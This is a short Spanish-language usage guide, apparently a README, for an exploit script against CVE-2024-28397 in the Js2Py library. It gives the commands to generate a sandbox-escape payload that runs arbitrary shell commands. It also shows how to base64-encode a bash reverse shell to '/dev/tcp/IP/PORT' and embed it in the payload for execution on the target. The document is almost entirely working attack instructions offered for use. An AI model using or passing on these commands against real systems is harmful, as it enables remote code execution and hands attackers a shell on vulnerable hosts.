
Este script genera un payload JavaScript que puede ser evaluado por Js2Py en entornos vulnerables donde los internals de Python están expuestos a través de wrappers de objetos.
Ejecución básica de comandos:
python3 cve-2024-28397.py -c "id"
Generar un payload compacto de una línea:
python3 cve-2024-28397.py -c "whoami" --compact
Generar el payload en Base64:
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0
Generar el payload de Js2Py:
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact
Reemplace BASE64_OUTPUT con la cadena Base64 generada en el primer paso.